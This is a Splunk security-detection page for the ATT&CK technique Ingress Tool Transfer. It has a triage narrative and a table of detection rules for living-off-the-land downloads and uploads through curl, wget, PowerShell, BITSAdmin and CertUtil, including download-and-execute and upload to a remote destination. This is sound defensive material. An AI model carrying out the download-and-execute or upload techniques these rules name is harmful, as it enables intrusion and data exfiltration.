Try in Splunk Security Cloud
Description
Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the Command And Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.
- Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
- Datamodel: Endpoint
- Last Updated: 2021-03-24
- Author: Michael Haag, Splunk
- ID: b3782036-8cbd-11eb-9d8e-acde48001122
Narrative
Ingress tool transfer is a Technique under tactic Command And Control. Behaviors will include the use of living off the land binaries to download implants or binaries over alternate communication ports. It is imperative to baseline applications on endpoints to understand what generates network activity, to where, and what is its native behavior. These utilities, when abused, will write files to disk in world writeable paths.\ During triage, review the reputation of the remote public destination IP or domain. Capture any files written to disk and perform analysis. Review other parrallel processes for additional behaviors.
Detections
Name |
Technique |
Type |
Any Powershell DownloadFile |
Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer |
TTP |
Any Powershell DownloadString |
Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer |
TTP |
BITSAdmin Download File |
BITS Jobs, Ingress Tool Transfer |
TTP |
CertUtil Download With URLCache and Split Arguments |
Ingress Tool Transfer |
TTP |
CertUtil Download With VerifyCtl and Split Arguments |
Ingress Tool Transfer |
TTP |
Curl Download and Bash Execution |
Ingress Tool Transfer |
TTP |
Detect Certify Command Line Arguments |
Steal or Forge Authentication Certificates, Ingress Tool Transfer |
TTP |
Detect Certipy File Modifications |
Steal or Forge Authentication Certificates, Archive Collected Data |
TTP |
Linux Curl Upload File |
Ingress Tool Transfer |
TTP |
Linux Ingress Tool Transfer Hunting |
Ingress Tool Transfer |
Hunting |
Linux Ingress Tool Transfer with Curl |
Ingress Tool Transfer |
Anomaly |
Linux Proxy Socks Curl |
Proxy, Non-Application Layer Protocol |
TTP |
Suspicious Curl Network Connection |
Ingress Tool Transfer |
TTP |
Wget Download and Bash Execution |
Ingress Tool Transfer |
TTP |
Windows Bitsadmin Download File |
BITS Jobs, Ingress Tool Transfer |
TTP |
Windows CertUtil URLCache Download |
Ingress Tool Transfer |
TTP |
Windows CertUtil VerifyCtl Download |
Ingress Tool Transfer |
TTP |
Windows Curl Download to Suspicious Path |
Ingress Tool Transfer |
TTP |
Windows Curl Upload to Remote Destination |
Ingress Tool Transfer |
TTP |
Windows Curl Upload to Remote Destination |
Ingress Tool Transfer |
TTP |
Windows Powershell DownloadFile |
Automated Exfiltration |
Anomaly |
Windows Powershell DownloadString |
Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer |
TTP |
Reference
source | version: 1